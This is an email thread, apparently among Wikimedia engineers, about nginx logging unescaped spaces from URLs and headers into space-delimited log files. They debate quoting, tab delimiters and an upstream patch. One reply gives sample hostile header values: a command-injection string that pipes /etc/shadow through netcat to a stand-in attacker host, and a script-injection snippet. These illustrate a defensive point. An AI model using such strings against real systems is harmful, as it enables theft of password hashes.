On Thu, May 10, 2012 at 7:57 AM, Andrew Otto otto@wikimedia.org wrote:
Diederik just asked me to check if I could reproduce the problem of spaces in logs for a request like this: https://en.m.wikipedia.org/wiki/Extensor_carpi%C2%A0radialis longus
Answer: nginx does not escape the spaces in the url.
But don't blame nginx! nginx is just being honest! The HTTP header had spaces in it, so it printed the spaces to the log file. I think nginx did exactly what it was supposed to. As David pointed out, it is allowed to have any whitespace (even newlines) in an HTTP header. Shouldn't the loggers just output what they see?
No, nginx should print that output in a context-appropriate fashion. Fun possible http header fields: " ; cat /etc/shadow | nc evil.example.com 80 <javascript>alert('whee!');</javascript>
Now, that's not to say that it's likely that we have vulnerabilities in these areas. However, context matters, and printing spaces in a space-delimited file is ...um... suboptimal.
It looks like the default for nginx is space-delimited, but to put quote marks around user input: http://wiki.nginx.org/HttpLogModule
...which is a pretty fragile strategy (though perhaps less fragile than not putting quote marks as we do).
I agree with Andrew that we shouldn't maintain a patched version of nginx logging code. However, if we submitted a patch for optionally escaping spaces in header fields, it seems pretty plausible that it'd be accepted.
Using tabs as the delimiter wouldn't solve the problem for ALL cases. It is possible to put tabs in headers, (right?). But for 99.999999% (that is a statistically researched number, don't question it) of cases, using tabs as delimiter would solve this problem.
I suppose this would be fine. I would recommend, though, making sure we contact everyone listed as contacts in the filters list on locke, emery, and oxygen.
Rob